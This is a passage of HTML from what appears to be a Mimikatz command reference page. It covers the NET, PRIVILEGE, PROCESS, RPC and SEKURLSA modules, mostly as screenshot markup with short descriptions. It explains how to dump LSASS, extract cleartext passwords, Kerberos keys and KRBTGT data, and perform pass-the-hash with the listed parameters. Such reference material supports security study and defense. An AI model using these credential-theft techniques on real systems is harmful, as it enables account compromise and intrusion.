src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias.png" alt="" width="422" height="598" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias.png 845w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias-212x300.png 212w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias-768x1088.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Alias-723x1024.png 723w" sizes="(max-width: 422px) 100vw, 422px" /></p> <p><b>NET::Group</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3807" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group.png" alt="" width="420" height="181" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group.png 843w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group-300x129.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Group-768x331.png 768w" sizes="(max-width: 420px) 100vw, 420px" /></p> <p><b>NET::ServerInfo</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3806" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo.png" alt="" width="450" height="99" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo.png 963w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo-300x66.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-ServerInfo-768x169.png 768w" sizes="(max-width: 450px) 100vw, 450px" /></p> <p><b>NET::Session</b></p> <p><b>NET::Share</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3805" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Share.png" alt="" width="329" height="344" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Share.png 652w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Share-287x300.png 287w" sizes="(max-width: 329px) 100vw, 329px" /></p> <p><b>NET::Stats</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3830" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats.png" alt="" width="500" height="40" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats.png 934w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats-300x24.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-Stats-768x62.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p> <p><b>NET::TOD</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3829" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-TOD.png" alt="" width="422" height="54" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-TOD.png 641w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-TOD-300x38.png 300w" sizes="(max-width: 422px) 100vw, 422px" /></p> <p><b>NET::User</b></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User.jpg" rel="attachment wp-att-2694"><img loading="lazy" decoding="async" class="alignnone wp-image-2694" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User.jpg" alt="Mimikatz-Net-User" width="332" height="281" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User.jpg 465w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Net-User-300x254.jpg 300w" sizes="(max-width: 332px) 100vw, 332px" /></a></p> <p><b>NET::WSession</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3828" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-WSession.png" alt="" width="261" height="117" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-WSession.png 388w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Net-WSession-300x135.png 300w" sizes="(max-width: 261px) 100vw, 261px" /></p> <p>&nbsp;</p> <h4><b><a id="PRIVILEGE"></a>PRIVILEGE</b></h4> <p><b>PRIVILEGE::</b><strong>Backup</strong> &#8211; get backup privilege/rights. Requires Debug rights.</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3827" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Privilege-Backup.png" alt="" width="264" height="40" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Privilege-Backup.png 443w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Privilege-Backup-300x45.png 300w" sizes="(max-width: 264px) 100vw, 264px" /></p> <p><a id="PRIVILEGEDebug"></a><b>PRIVILEGE::Debug</b> &#8211; get debug rights (this or Local System rights is required for many Mimikatz commands).<br /> By default, the Administrators group has Debug rights. Debug still has to be &#8220;activated&#8221; by running &#8220;privilege::debug&#8221;.</p> <p><em>The debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. For example, a process running as a user with the debug privilege enabled on its token can debug a service running as local system.</em><br /> <em><a href="http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx">http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx</a></em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Privilege-Debug.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1829" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Privilege-Debug.png" alt="Mimikatz-Privilege-Debug" width="260" height="47" /></a></p> <p><span style="text-decoration: underline;">Benjamin&#8217;s Remark:</span><br /> ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege is not held by the client (mostly you&#8217;re not an administrator :smirk:)</p> <p><b>PRIVILEGE::Driver </b>&#8211; get driver privilege/rights. Requires Debug rights.</p> <p><b>PRIVILEGE::ID</b> &#8211; get privilege/rights by its ID. Requires Debug rights.</p> <p><b>PRIVILEGE::Name</b> &#8211; get privilege/rights by its name. Requires Debug rights.</p> <p><b>PRIVILEGE::Restore</b> &#8211; get restore privilege/rights. Requires Debug rights.</p> <p><b>PRIVILEGE::Security</b> &#8211; get security privilege/rights. Requires Debug rights.</p> <p><b>PRIVILEGE::SysEnv</b> &#8211; get privilege/rights to manage system environment. Requires Debug rights.</p> <p><b>PRIVILEGE::TCB</b> &#8211; get TCB privilege/rights(likely act as part of the operating system right). Requires elevated rights (still TBD).</p> <p>&nbsp;</p> <h4><b><a id="PROCESS"></a>PROCESS</b></h4> <p>The Mimikatz PROCESS module provides the ability to gather data on processes and interact with processes.</p> <p><b>PROCESS::Exports</b> &#8211; list exports</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports.jpg" rel="attachment wp-att-2167"><img loading="lazy" decoding="async" class="alignnone wp-image-2167" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports.jpg" alt="Mimikatz-Process-Exports" width="541" height="653" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports.jpg 1381w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports-249x300.jpg 249w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports-768x926.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Exports-849x1024.jpg 849w" sizes="(max-width: 541px) 100vw, 541px" /></a></p> <p><b>PROCESS::Imports</b> &#8211; list imports</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports.jpg" rel="attachment wp-att-2170"><img loading="lazy" decoding="async" class="alignnone wp-image-2170" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports.jpg" alt="Mimikatz-Process-Imports" width="417" height="599" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports.jpg 1163w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports-209x300.jpg 209w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports-768x1104.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Imports-712x1024.jpg 712w" sizes="(max-width: 417px) 100vw, 417px" /></a></p> <p><b>PROCESS::List</b> &#8211; List running processes<br /> Requires Administrator rights.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List.jpg" rel="attachment wp-att-2169"><img loading="lazy" decoding="async" class="alignnone wp-image-2169" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List.jpg" alt="Mimikatz-Process-List" width="292" height="590" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List.jpg 638w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List-148x300.jpg 148w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-List-507x1024.jpg 507w" sizes="(max-width: 292px) 100vw, 292px" /></a></p> <p><b>PROCESS::Resume</b> &#8211; resume a process</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume.jpg" rel="attachment wp-att-2171"><img loading="lazy" decoding="async" class="alignnone wp-image-2171" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume.jpg" alt="Mimikatz-Process-Resume" width="267" height="37" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume.jpg 469w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Resume-300x42.jpg 300w" sizes="(max-width: 267px) 100vw, 267px" /></a></p> <p><b>PROCESS::Run </b>&#8211;  Run</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3826" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Process-Run.png" alt="" width="268" height="390" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Process-Run.png 508w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Process-Run-206x300.png 206w" sizes="(max-width: 268px) 100vw, 268px" /></p> <p><b>PROCESS::Start</b> &#8211; start a process</p> <p><b>PROCESS::Stop</b> &#8211; terminate a process</p> <p><b>PROCESS::Suspend</b> &#8211; suspend a process</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend.jpg" rel="attachment wp-att-2172"><img loading="lazy" decoding="async" class="alignnone wp-image-2172" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend.jpg" alt="Mimikatz-Process-Suspend" width="289" height="35" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend.jpg 495w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Process-Suspend-300x36.jpg 300w" sizes="(max-width: 289px) 100vw, 289px" /></a></p> <p>&nbsp;</p> <h4><b><a id="RPC"></a>RPC</b></h4> <p>The RPC module provides remote control of mimikatz.</p> <p><b>RPC::Close</b></p> <p><b>RPC::Connect</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3823" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Connect.png" alt="" width="280" height="255" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Connect.png 560w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Connect-300x273.png 300w" sizes="(max-width: 280px) 100vw, 280px" /></p> <p><b>RPC::Enum</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3825" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum.png" alt="" width="574" height="707" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum.png 1178w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum-244x300.png 244w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum-768x946.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Enum-831x1024.png 831w" sizes="(max-width: 574px) 100vw, 574px" /></p> <p><b>RPC::Server</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3824" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server.png" alt="" width="425" height="177" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server.png 885w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server-300x125.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server-768x319.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-RPC-Server-720x300.png 720w" sizes="(max-width: 425px) 100vw, 425px" /></p> <p>&nbsp;</p> <h4><b><a id="SEKURLSA"></a>SEKURLSA</b></h4> <p>The SEKURLSA Mimikatz module interacts with protected memory. This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service).<br /> In order to interact with LSASS, the Mimikatz process requires appropriate rights:</p> <ul> <li>Administrator, to get debug privilege via <em>&#8220;PRIVILEGE::Debug&#8221; </em></li> <li>SYSTEM rights (<em>&#8220;TOKEN::elevate&#8221;)</em></li> </ul> <p>However, running against a dumped LSASS process file (i.e. LSASS.dmp), elevated rights are not required.</p> <p><b>SEKURLSA::Backupkeys</b> &#8211; get preferred backup master keys</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys.jpg" rel="attachment wp-att-2173"><img loading="lazy" decoding="async" class="alignnone wp-image-2173" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys.jpg" alt="Mimikatz-sekurlsa-Backupkeys" width="394" height="75" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys.jpg 850w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys-300x57.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-sekurlsa-Backupkeys-768x146.jpg 768w" sizes="(max-width: 394px) 100vw, 394px" /></a></p> <p><b>SEKURLSA::Credman</b> &#8211; List Credentials Manager</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1830" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman.png" alt="Mimikatz-Sekurlsa-Credman" width="474" height="560" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman.png 474w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Credman-254x300.png 254w" sizes="(max-width: 474px) 100vw, 474px" /></a></p> <p><b>SEKURLSA::Dpapi</b> &#8211; list cached MasterKeys</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1831" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI.png" alt="Mimikatz-Sekurlsa-DPAPI" width="478" height="554" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI.png 478w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPI-259x300.png 259w" sizes="(max-width: 478px) 100vw, 478px" /></a></p> <p><b>SEKURLSA::DpapiSystem</b> &#8211; DPAPI_SYSTEM secret</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1832" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem.png" alt="Mimikatz-Sekurlsa-DPAPISystem" width="631" height="57" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem.png 631w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-DPAPISystem-300x27.png 300w" sizes="(max-width: 631px) 100vw, 631px" /></a></p> <p><a id="SEKURLSAEkeys"></a><b>SEKURLSA::Ekeys</b> &#8211; list Kerberos encryption keys</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1833" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys.png" alt="Mimikatz-Sekurlsa-EKeys" width="752" height="677" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys.png 752w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-EKeys-300x270.png 300w" sizes="(max-width: 752px) 100vw, 752px" /></a></p> <p><a id="SEKURLSAKerberos"></a><b>SEKURLSA::Kerberos</b> &#8211; List Kerberos credentials for all authenticated users (including services and computer account)</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1834" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos.png" alt="Mimikatz-Sekurlsa-Kerberos" width="751" height="611" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos.png 751w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Kerberos-300x244.png 300w" sizes="(max-width: 751px) 100vw, 751px" /></a></p> <p><a id="SEKURLSAKrbtgt"></a><b>SEKURLSA::Krbtgt</b> &#8211; get Domain Kerberos service account (KRBTGT)password data</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1835" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT.png" alt="Mimikatz-Sekurlsa-KrbTGT" width="669" height="119" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT.png 669w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-KrbTGT-300x53.png 300w" sizes="(max-width: 669px) 100vw, 669px" /></a></p> <p><b>SEKURLSA::LiveSSP</b> &#8211; Lists LiveSSP credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1836" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP.png" alt="Mimikatz-Sekurlsa-LiveSSP" width="477" height="657" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP.png 477w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-LiveSSP-218x300.png 218w" sizes="(max-width: 477px) 100vw, 477px" /></a></p> <p><a id="SEKURLSALogonPasswords"></a><b>SEKURLSA::LogonPasswords</b> &#8211; lists all available provider credentials. This usually shows recently logged on user and computer credentials.</p> <ul> <li>Dumps password data in LSASS for currently logged on (or recently logged on) accounts as well as services running under the context of user credentials.</li> <li>Account passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows 8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2 doesn’t store the account password in this manner in most cases. KB2871997 &#8220;back-ports&#8221; this security capability to  Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the computer needs additional configuration after applying KB2871997.</li> <li>Requires administrator access (with debug rights) or Local SYSTEM rights</li> </ul> <p><span style="font-family: times new roman;"><strong style="font-size: medium;">Windows Server 2008 R2 System (Password is shown).</strong>                                                 </span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win10.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-Part1" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win10_thumb.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-Part1" width="572" height="851" border="0" /></span></a><span style="font-family: times new roman;">  </span></p> <p><strong><span style="font-family: times new roman;">Windows Server 2012 R2 system – no cleartext password shown</span></strong></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2012R21.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" class="" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2012R2" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2012R2_thumb1.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2012R2" width="569" height="692" border="0" /></span></a></p> <p><span style="font-family: times new roman;">Services running with account credentials are also dumped using this command.<br /> Note that only services that are running (credentials in memory) can be dumped in this manner.<br /> </span></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/WindowsServer2008R2-SQLServices.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="WindowsServer2008R2-SQLServices" src="https://adsecurity.org/wp-content/uploads/2015/01/WindowsServer2008R2-SQLServices_thumb.png" alt="WindowsServer2008R2-SQLServices" width="848" height="296" border="0" /></span></a></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part22.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" class="" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2_thumb2.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2" width="515" height="298" border="0" /></span></a></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part32.png"><span style="font-family: times new roman;"><img loading="lazy" decoding="async" class="" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3" src="https://adsecurity.org/wp-content/uploads/2015/01/Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3_thumb2.png" alt="Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3" width="519" height="295" border="0" /></span></a></p> <p>&nbsp;</p> <p><b>SEKURLSA::Minidump</b> &#8211; switch to LSASS minidump process context</p> <p>There are several different ways to dump LSASS:  <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procdump">procdump</a>, <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1">PowerShell</a>, Task Manager, etc.</p> <p>Note that Minidumps need to be read using the same platform it was dumped from NT5 Win32 or NT5x64 or NT6 Win32 or NT6 x64.<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1838" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump.png" alt="Mimikatz-Sekurlsa-Minidump" width="449" height="207" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump.png 829w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Minidump-300x138.png 300w" sizes="(max-width: 449px) 100vw, 449px" /></a></p> <p>Another option is to dump the LSASS process with Task Manager</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3835" src="https://adsecurity.org/wp-content/uploads/2017/11/Dump-LSASS-With-TaskManager.png" alt="" width="400" height="444" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Dump-LSASS-With-TaskManager.png 400w, https://adsecurity.org/wp-content/uploads/2017/11/Dump-LSASS-With-TaskManager-270x300.png 270w" sizes="(max-width: 400px) 100vw, 400px" /></p> <p>Sekurlsa::minidump can open the dump file.</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3837" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-02.png" alt="" width="509" height="235" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-02.png 509w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-02-300x139.png 300w" sizes="(max-width: 509px) 100vw, 509px" /> <img loading="lazy" decoding="async" class="alignnone size-full wp-image-3836" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-01.png" alt="" width="521" height="318" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-01.png 521w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-sekurlsa-minidump-01-300x183.png 300w" sizes="(max-width: 521px) 100vw, 521px" /></p> <p>&nbsp;</p> <p><b>SEKURLSA::MSV</b> &#8211; List LM &amp; NTLM credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1839" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV.png" alt="Mimikatz-Sekurlsa-MSV" width="473" height="674" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV.png 473w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-MSV-211x300.png 211w" sizes="(max-width: 473px) 100vw, 473px" /></a></p> <p><b>SEKURLSA::Process</b> &#8211; switch to LSASS process context</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Process.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1840" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-Process.png" alt="Mimikatz-Sekurlsa-Process" width="273" height="36" /></a></p> <p><a id="SEKURLSAPth"></a><b>SEKURLSA::Pth</b> &#8211; Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).</p> <p><em>Mimikatz can perform the well-known operation &#8216;Pass-The-Hash&#8217; to run a process under another credentials with NTLM hash of the user&#8217;s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).</em></p> <ul> <li>/user &#8211; the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.</li> <li>/domain &#8211; the fully qualified domain name &#8211; without domain or in case of local user/admin, use computer or server name, workgroup or whatever.</li> <li>/rc4 or /ntlm &#8211; optional &#8211; the RC4 key / NTLM hash of the user&#8217;s password.</li> <li>/run &#8211; optional &#8211; the command line to run &#8211; default is: cmd to have a shell.</li> </ul> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg" rel="attachment wp-att-2174"><img loading="lazy" decoding="async" class="alignnone wp-image-2174" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg" alt="Mimikatz-Sekurlsa-PTH" width="645" height="272" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH.jpg 1682w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH-300x127.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH-768x325.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-PTH-1024x433.jpg 1024w" sizes="(max-width: 645px) 100vw, 645px" /></a></p> <p><span style="text-decoration: underline;">Benjamin&#8217;s Remarks:</span></p> <ul> <li>This command does not work with minidumps (nonsense);</li> <li>it requires elevated privileges (privilege::debug or SYSTEM account), unlike &#8216;Pass-The-Ticket&#8217; which uses one official API ;<br /> this new version of &#8216;Pass-The-Hash&#8217; replaces RC4 keys of Kerberos by the ntlm hash (and/or replaces AES keys) &#8211; it permits to the Kerberos provider to ask TGT tickets! ;</li> <li>ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ;</li> <li>AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.</li> </ul> <p><a href="http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash">Benjamin&#8217;s post on overpass-the-has</a>h.</p> <p><b>SEKURLSA::SSP</b> &#8211; Lists SSP credentials</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1841" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP.png" alt="Mimikatz-Sekurlsa-SSP" width="481" height="670" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP.png 481w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Sekurlsa-SSP-215x300.png 215w" sizes="(max-width: 481px) 100vw, 481px" /></a></p> <p><a 